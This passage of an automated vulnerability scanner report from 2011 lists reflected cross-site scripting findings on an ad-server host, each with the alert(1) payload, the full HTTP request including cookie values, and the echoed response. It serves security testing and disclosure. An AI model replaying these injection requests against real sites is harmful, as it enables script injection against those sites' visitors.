4.297. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1120619784@x23

Issue detail

The value of the USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 291d7"-alert(1)-"efee496423e was submitted in the USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300291d7"-alert(1)-"efee496423e HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2485
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/ATTWL_11Q1_Cllctv_MobRON_300291d7"-alert(1)-"efee496423e";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.298. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1120619784@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6e8e"-alert(1)-"d03ef3df83b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/1120619784@x23?USNetwork/ATTWL_11Q1_Cllctv_MobRON_300&f6e8e"-alert(1)-"d03ef3df83b=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2488
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/ATTWL_11Q1_Cllctv_MobRON_300&f6e8e"-alert(1)-"d03ef3df83b=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.299. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11419206302@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e8c"><script>alert(1)</script>e444b89420b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM27e8c"><script>alert(1)</script>e444b89420b/2010DM/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

4.300. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11419206302@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7c0"><script>alert(1)</script>ffd68c8554e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMfb7c0"><script>alert(1)</script>ffd68c8554e/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

4.301. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11419206302@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65e59"><script>alert(1)</script>421d71bc1c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11419206302@x2365e59"><script>alert(1)</script>421d71bc1c5?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/538045584/x2365e59"><script>alert(1)</script>421d71bc1c5/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.302. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11419206302@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2c42"-alert(1)-"8439d2acd81 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300c2c42"-alert(1)-"8439d2acd81 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300c2c42"-alert(1)-"8439d2acd81";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.303. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11419206302@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9d3"-alert(1)-"c26e4d9cfe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&5e9d3"-alert(1)-"c26e4d9cfe5=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&5e9d3"-alert(1)-"c26e4d9cfe5=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.304. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11452529046@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70ff5"><script>alert(1)</script>d6553860e48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM70ff5"><script>alert(1)</script>d6553860e48/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM70ff5"><script>alert(1)</script>d6553860e48/2010DM/396567383/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.305. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11452529046@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e82"><script>alert(1)</script>7a3c9d94146 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM94e82"><script>alert(1)</script>7a3c9d94146/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM94e82"><script>alert(1)</script>7a3c9d94146/639000892/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.306. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11452529046@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26307"><script>alert(1)</script>cf2e854f33a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11452529046@x2326307"><script>alert(1)</script>cf2e854f33a?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:02:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1492542860/x2326307"><script>alert(1)</script>cf2e854f33a/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.307. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11452529046@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e274"-alert(1)-"0556165f4c0 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3001e274"-alert(1)-"0556165f4c0 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3001e274"-alert(1)-"0556165f4c0";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.308. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11452529046@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2009a"-alert(1)-"48bddd10057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&2009a"-alert(1)-"48bddd10057=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
